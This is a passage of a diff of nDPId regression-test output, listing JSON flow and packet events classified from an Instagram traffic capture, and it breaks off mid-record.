+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -229,17 +228,17 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 